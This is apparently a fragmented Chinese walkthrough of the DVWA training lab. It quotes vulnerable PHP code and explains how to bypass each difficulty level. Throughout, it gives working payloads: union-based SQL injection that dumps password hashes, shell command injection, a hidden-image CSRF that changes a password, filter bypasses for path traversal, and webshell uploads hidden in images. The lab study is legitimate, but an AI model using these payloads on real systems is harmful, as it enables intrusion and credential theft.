// Get username$user=$_GET['username'];
这里对于输入输出没有做一定的过滤和数据清洗,可以使用万能密码进行登录
// Get password$pass=$_GET['password'];$pass=md5($pass);// Check the database$query="SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";$result=mysqli_query($GLOBALS["___mysqli_ston"],$query)ordie('<pre>'.((is_object($GLOBALS["___mysqli_ston"]))?mysqli_error($GLOBALS["___mysqli_ston"]):(($___mysqli_res=mysqli_connect_error())?$___mysqli_res:false)).'</pre>');if($result&&mysqli_num_rows($result)==1){// Get users details$row=mysqli_fetch_assoc($result);$avatar=$row["avatar"];// Login successfulecho"<p>Welcome to the password protected area {$user}</p>";echo"<img src=\"{$avatar}\" />";}
2. 看看中等级别的medium:
//处理输入:首先是检查了数据库连接,然后对输入的内容进行了字符转义(字符前加了反斜杠),这样就可以有效防止数据库注入// Sanitise username input$user=$_GET['username'];$user=((isset($GLOBALS["___mysqli_ston"])&&is_object($GLOBALS["___mysqli_ston"]))?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$user):((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.",E_USER_ERROR))?"":""));// Sanitise password input$pass=$_GET['password'];$pass=((isset($GLOBALS["___mysqli_ston"])&&is_object($GLOBALS["___mysqli_ston"]))?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$pass):((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.",E_USER_ERROR))?"":""));$pass=md5($pass);// Check the database$query="SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";$result=mysqli_query($GLOBALS["___mysqli_ston"],$query)ordie('<pre>'.((is_object($GLOBALS["___mysqli_ston"]))?mysqli_error($GLOBALS["___mysqli_ston"]):(($___mysqli_res=mysqli_connect_error())?$___mysqli_res:false)).'</pre>');//登录失败:延迟两秒可以减缓攻击频率,有效防止攻击// Login failedsleep(2);echo"<pre><br />Username and/or password incorrect.</pre>";
<?phpif(isset($_POST['Login'])&&isset($_POST['username'])&&isset($_POST['password'])){// Check Anti-CSRF tokencheckToken($_REQUEST['user_token'],$_SESSION['session_token'],'index.php');//同样使用了token技术,来防止不合法的访问// Sanitise username input$user=$_POST['username'];$user=stripslashes($user);$user=((isset($GLOBALS["___mysqli_ston"])&&is_object($GLOBALS["___mysqli_ston"]))?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$user):((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.",E_USER_ERROR))?"":""));// Sanitise password input$pass=$_POST['password'];$pass=stripslashes($pass);$pass=((isset($GLOBALS["___mysqli_ston"])&&is_object($GLOBALS["___mysqli_ston"]))?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$pass):((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.",E_USER_ERROR))?"":""));$pass=md5($pass);//净化了输入,将移除反斜杠// Default values$total_failed_login=3;$lockout_time=15;$account_locked=false;//为登录失败设置锁定时间.// Check the database (Check user information)$data=$db->prepare('SELECT failed_login, last_login FROM users WHERE user = (:user) LIMIT 1;');$data->bindParam(':user',$user,PDO::PARAM_STR);$data->execute();$row=$data->fetch();//使用PDO预编译机制,可以有效防止sql注入// Check to see if the user has been locked out.if(($data->rowCount()==1)&&($row['failed_login']>=$total_failed_login)){// User locked out. Note, using this method would allow for user enumeration!//echo "<pre><br />This account has been locked due to too many incorrect logins.</pre>";//超时会锁定时间,以下是计算锁定时间的逻辑// Calculate when the user would be allowed to login again$last_login=strtotime($row['last_login']);$timeout=$last_login+($lockout_time*60);$timenow=time();/*print "The last login was: " . date ("h:i:s", $last_login) . "<br />";print "The timenow is: " . date ("h:i:s", $timenow) . "<br />";print "The timeout is: " . date ("h:i:s", $timeout) . "<br />";*/// Check to see if enough time has passed, if it hasn't locked the accountif($timenow<$timeout){$account_locked=true;// print "The account is locked<br />";}}// Check the database (if username matches the password)$data=$db->prepare('SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;');$data->bindParam(':user',$user,PDO::PARAM_STR);$data->bindParam(':password',$pass,PDO::PARAM_STR);$data->execute();$row=$data->fetch();// If its a valid login...if(($data->rowCount()==1)&&($account_locked==false)){// Get users details$avatar=$row['avatar'];$failed_login=$row['failed_login'];$last_login=$row['last_login'];// Login successfulecho"<p>Welcome to the password protected area <em>{$user}</em></p>";echo"<img src=\"{$avatar}\" />";// Had the account been locked out since last login?if($failed_login>=$total_failed_login){echo"<p><em>Warning</em>: Someone might of been brute forcing your account.</p>";echo"<p>Number of login attempts: <em>{$failed_login}</em>.<br />Last login attempt was at: <em>{$last_login}</em>.</p>";}// Reset bad login count$data=$db->prepare('UPDATE users SET failed_login = "0" WHERE user = (:user) LIMIT 1;');$data->bindParam(':user',$user,PDO::PARAM_STR);$data->execute();}else{// Login failedsleep(rand(2,4));// Give the user some feedbackecho"<pre><br />Username and/or password incorrect.<br /><br/>Alternative, the account has been locked because of too many failed logins.<br />If this is the case, <em>please try again in {$lockout_time} minutes</em>.</pre>";//统一报错信息,无法根据回显的不同来判断用户的有无// Update bad login count$data=$db->prepare('UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;');$data->bindParam(':user',$user,PDO::PARAM_STR);$data->execute();}// Set the last login time$data=$db->prepare('UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;');$data->bindParam(':user',$user,PDO::PARAM_STR);$data->execute();}// Generate Anti-CSRF tokengenerateSessionToken();?>
if(isset($_POST['Submit'])){// Get input$target=$_REQUEST['ip'];// Determine OS and execute the ping command.if(stristr(php_uname('s'),'Windows NT')){// Windows$cmd=shell_exec('ping '.$target);//直接对命令进行拼接,无过滤}else{// *nix$cmd=shell_exec('ping -c 4 '.$target);}// Feedback for the end userecho"<pre>{$cmd}</pre>";}
2. medium:看看源码:
// Set blacklist$substitutions=array('&&'=>'',';'=>'',);//利用了黑名单将分号和&&过滤,可以使用|或||进行绕过// Remove any of the characters in the array (blacklist).$target=str_replace(array_keys($substitutions),$substitutions,$target);
3. high:看看源码:
//将几种核心的绕过方法都进行绕过// Set blacklist$substitutions=array('||'=>'','&'=>'',';'=>'','| '=>'',//这里转换的是|加一个空格,所以使用|是可以的'-'=>'','$'=>'','('=>'',')'=>'',//在linux下可以使用 将括号中的命令结果替换到原位置127.0.0.1$(touch /tmp/pwned)# 创建文件/tmp/pwned'`'=>'',);// Remove any of the characters in the array (blacklist).$target=str_replace(array_keys($substitutions),$substitutions,$target);
4. impossible:看看源码:
// Get input$target=$_REQUEST['ip'];$target=stripslashes($target);//这里会移除所有的反斜杠// Split the IP into 4 octects$octet=explode(".",$target);//将输入的内容分成了4个部分,确保每一部分是数字,这样就极大的减小了命令注入的风险// Check IF each octet is an integerif((is_numeric($octet[0]))&&(is_numeric($octet[1]))&&(is_numeric($octet[2]))&&(is_numeric($octet[3]))&&(sizeof($octet)==4)){// If all 4 octets are int's put the IP back together.$target=$octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];// Determine OS and execute the ping command.if(stristr(php_uname('s'),'Windows NT')){// Windows$cmd=shell_exec('ping '.$target);
<?phpif(isset($_GET['Change'])){// Get input$pass_new=$_GET['password_new'];$pass_conf=$_GET['password_conf'];//得到两个密码的输入// Do the passwords match?// 两个密码输入的一样的话就可以将新的密码插入到数据库中,成功更改密码if($pass_new==$pass_conf){// They do!$pass_new=((isset($GLOBALS["___mysqli_ston"])&&is_object($GLOBALS["___mysqli_ston"]))?mysqli_real_escape_string($GLOBALS["___mysqli_ston"],$pass_new):((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.",E_USER_ERROR))?"":""));$pass_new=md5($pass_new);// Update the database$current_user=dvwaCurrentUser();$insert="UPDATE `users` SET password = '$pass_new' WHERE user = '".$current_user."';";$result=mysqli_query($GLOBALS["___mysqli_ston"],$insert)ordie('<pre>'.((is_object($GLOBALS["___mysqli_ston"]))?mysqli_error($GLOBALS["___mysqli_ston"]):(($___mysqli_res=mysqli_connect_error())?$___mysqli_res:false)).'</pre>');//如果两个密码输入的匹配的话,就更新当前用户密码// Feedback for the userecho"<pre>Password Changed.</pre>";}else{// Issue with passwords matchingecho"<pre>Passwords did not match.</pre>";}((is_null($___mysqli_res=mysqli_close($GLOBALS["___mysqli_ston"])))?false:$___mysqli_res);}?>
//stripos(str1, str2)检查str2在str1中出现的位置(不区分大小写),如果有返//回True,反之False//判断Host字段是否出现在referer字段中if(stripos($_SERVER['HTTP_REFERER'],$_SERVER['SERVER_NAME'])!==false){// Get input$pass_new=$_GET['password_new'];$pass_conf=$_GET['password_conf'];这些是比low级别多的一些内容,主要是增加了对于referer的检验,为了绕过,我们必须要在referer字段里面增加当前的站名
于是绕过方法如下,<img src="http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#" border="0" style="display:none;"/><h1>404<h1><h2>file not found.<h2>
low:看看源码:这里是将id直接拼接到sql语句中没有对其做进一步的处理:于是就采用最常见的方法进行注入:判断注入方式:1'发现报错,检测回显字段数量:-1' order by 3#那就是2个字段查看所遇数据库名:-1' union select 1,group_concat(schema_name) from information_schema.schemata;#当前数据库:-1' union select 1,database();#数据库下的表:-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa';#对应表的字段:-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema='dvwa' and table_name='users';#具体字段值:-1' union select 1,group_concat(password) from dvwa.users;#
high:看看源码:相比于中级难度,这里多了一个llimit 1,作用是每次只显示一行查询结果,这里如果使用上一题的做法晚完全可以,-1' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273;#那么这一题的作用何在呢?这一题实际上是为了防止使用自动化工具
重置好数据库之后,重新登录就可以看到这样一个界面,蕴含着一些基础的漏洞.
得到账户名密码,同时也可以使用
看看源码:
来看看low级别的源码:
这里发现,每次进行不同的点击查看不同的文件,page的参数值就会改变,于是将page的参数值更改为其他希望读取的文件,这里可以随意试试文件名: 
没有做任何安全措施,于是可以尝试访问一下上级目录的phpinfo,
利用成功.
这里可以看到是将相对路径访问的形式给过滤了,这样就不可以直接通过…/…/去访问文件,但是的话,这里用到的是php的str_Replace函数,这个函数进行的替换操作可以通过双写进行绕过,于是我们可以试试:这里的…/./就是通过双写方式进行绕过的
可以看到成功读取到了phpinfo文件,同样的,过滤了http这里可以采用hthttp://tp://来进行绕过,
这里也是可以成功访问到百度的网页,不过实际环境中,我们不会使用这个,而是执行远程服务器的代码,达到植入木马或者获取敏感信息的目的.通常这里可以使用一个远程服务器的木马地址,进行连接,然后使用菜刀或者蚁剑连接即可,
这里要求文件名必须匹配以file开头或者是include.php才行.但是这里可以使用file://,这个协议用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。于是乎,可以利用file:///+文件绝对路径的方式进行读取:
使用了白名单,没办法了,这样已经足够安全了,可以有效防止文件包含漏洞
可以发现,这段代码是这样的,先将上传的文件进行一个命名的保存,两次直接 拼接,而不对上传的文件后缀和文件头信息进行检查,于是乎,这种情况是可以直接使用php文件进行上传的:
成功连接后台
可以发现这里多了个类型绕过,前端类型绕过,于是我们可以先将一个php文件后缀更改为jpg,然后再使用bp抓包,更改后缀为php即可,
这个题和上一题有增加了一个点,就是getimagesize这个函数,这个函数除了能够获得图片的大小之外呢,还有个隐藏功能,他能够判断你这个图片是否能真的被打开,判断是不是真的是一个图片,那么实际上这里已经对文件上传来说已经很完善了,但是,做过之前的文件包含我们知道,这里还可以利用之前的文件包含,在include函数解析图片马的时候,是会解析图片里面的内容的,如果包含php代码,那么就会强制转码,并且将php代码进行执行,于是我们先准备一个图片马,使用010打开图片将一句话木马镶嵌在里面,
通过之前的文件包含页面进行访问发现可以成功访问,于是使用菜刀进行连接即可.
这里加入了token的判断,同时跟之前了开始类似,先获需要的信息,比如文件名,文件后缀,文件大小,临时文件路径,然后确定文件要移动到的位置,对文件进行处理,先判断文件类型是否是图片,通过http报文进行第一步判断,然后再使用getimagesize,判断是不是一个可以打开的图片,最后在使用imagegenerate,通过当前图片在生成一个新的图片,同时会去掉图片里面的注释等无用信息,我们写的木马就是在注释里面的,于是,这种方法也有效预防了图片马的上传.
这里是将id直接拼接到sql语句中没有对其做进一步的处理:于是就采用最常见的方法进行注入:判断注入方式:
检测回显字段数量:
查看所遇数据库名:
当前数据库:
数据库下的表:
对应表的字段:
具体字段值:
这里如果遇到需要使用单引号的,可以通过使用十六进制绕过函数mysql_real_escape_string,user的十六进制是
相比于中级难度,这里多了一个llimit 1,作用是每次只显示一行查询结果,这里如果使用上一题的做法晚完全可以,
那么这一题的作用何在呢?这一题实际上是为了防止使用自动化工具
这里一共是进行了四层防护,首先第一个是设置了token.这样就防止了使用自动化工具进行使用,第二项是使用了is_numeric函数,判断id是不是数字,是数字才可以,第三层是使用预处理函数prepare,进一步防范,最后一层再次对id的类型进行了一个校验,必须为数字类型的,这样一来安全系数就大大提高了.
而当我们输入1’ and 1=1#这回显存在,那么这里可以发现,只要我们将and后面的条件改一下,就可以得到两种不同的结果于是乎,可以开始构造payload了,首先看看数据库名长度吧,
逐个破解数据库名:
获取表名:
字段名:
查询字段:
后面的步骤是一样的.
这里的url也进行了更新:
这里首先检查了是否有进行输入,如果有的话将其直接拼接到输出语句里面,有输入有输出,试试插入js代码试试:
发现可以形成弹窗,也就是存在XSS,于是,我们进行攻击, 使用
在low的基础上将